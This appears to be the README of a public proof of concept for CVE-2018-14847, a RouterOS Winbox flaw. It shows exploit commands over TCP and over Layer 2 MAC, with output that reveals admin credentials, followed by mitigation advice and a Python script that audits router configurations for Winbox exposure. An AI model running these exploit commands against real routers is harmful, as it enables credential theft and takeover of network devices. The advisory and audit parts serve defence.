Proof of Concept of RouterOS v6.42 Critical Vulnerability - CVE-2018-14847.
https://www.exploit-db.com/exploits/45170
https://blog.mikrotik.com/security/new-exploit-for-mikrotik-router-winbox-vulnerability.html
Winbox (TCP/IP)
python mikrotik_exploit.py 192.168.88.1
# Connected to 192.168.88.1:8291
# Exploit successful
# User: admin
# Pass: Th3P4ssWord
MAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)
python mac_server_discover.py
# Looking for Mikrotik devices (MAC servers)
# 192.168.88.1 --> aa:bb:cc:dd:ee:ff
# 192.168.88.2 --> aa:bb:cc:dd:ee:aa
python mac_server_exploit.py aa:bb:cc:dd:ee:ff
# Connected to aa:bb:cc:dd:ee:ff
# Exploit successful
# User: admin
# Pass: Th3P4ssWord
All versions from 6.29 (release date: 2015/05/28) to 6.42 (release date: 2018/04/20) are vulnerable.
- Update your RouterOS to the latest version or the Bugfix version.
- Do not use Winbox; disable it. It's nothing but a GUI for NooBs.
- You may use some Filter Rules (ACL) to deny anonymous access to the Router, for example:
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
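An added example, not part of the original PoC or of MikroTik's tooling: a small Python audit that reads a RouterOS `/export` and reports whether Winbox is still reachable over TCP 8291 or over the Layer 2 MAC server described above. The sample export is constructed, and the export syntax and the "all" default for allowed-interface-list are assumptions based on RouterOS 6.41 and later.

```python
import re

# Constructed sample of RouterOS `/export` output (not from a real device).
SAMPLE_EXPORT = """\
/ip firewall filter
add action=drop chain=input dst-port=8291 in-interface=wan protocol=tcp
/tool mac-server mac-winbox
set allowed-interface-list=LAN
"""

def parse_export(text):
    """Yield (menu, verb, first_token, params) for each command line."""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join lines wrapped with a backslash
    menu = None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("/"):
            menu = line
        elif line and not line.startswith("#"):
            verb, _, rest = line.partition(" ")
            params = dict(re.findall(r'([\w-]+)=("[^"]*"|\S+)', rest))
            yield menu, verb, rest.split(" ", 1)[0], params

def covers_port(spec, port):
    """True if a dst-port value such as '22,8000-9000' includes port."""
    ranges = (part.partition("-") for part in spec.split(","))
    return any(lo.isdigit() and int(lo) <= port <= int(hi or lo) for lo, _, hi in ranges)

def audit_winbox(text):
    """Return findings about Winbox exposure over TCP 8291 and MAC-Winbox."""
    svc, mac, dropped = {}, {}, []
    for menu, verb, item, p in parse_export(text):
        if (menu, verb, item) == ("/ip service", "set", "winbox"):
            svc = p
        elif (menu, verb) == ("/tool mac-server mac-winbox", "set"):
            mac = p
        elif ((menu, verb) == ("/ip firewall filter", "add") and p.get("disabled") != "yes"
              and (p.get("chain"), p.get("action"), p.get("protocol")) == ("input", "drop", "tcp")
              and covers_port(p.get("dst-port", ""), 8291)):
            dropped.append(p.get("in-interface") or p.get("in-interface-list") or "any")
    findings = []
    if svc.get("disabled") != "yes":  # unset in a compact export means enabled
        if "address" not in svc:
            findings.append("winbox service has no address= allow-list")
        if "any" not in dropped:
            findings.append("tcp/8291 dropped only on: " + (",".join(sorted(dropped)) or "nothing"))
    mac_list = mac.get("allowed-interface-list", "all")  # assumed default when unset
    if mac_list != "none":
        findings.append("MAC-Winbox allowed on interface list: " + mac_list)
    return findings
```

The audit does not evaluate rule order or accept rules placed above the drop, so an empty result still needs a manual look at the input chain.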
Enjoy!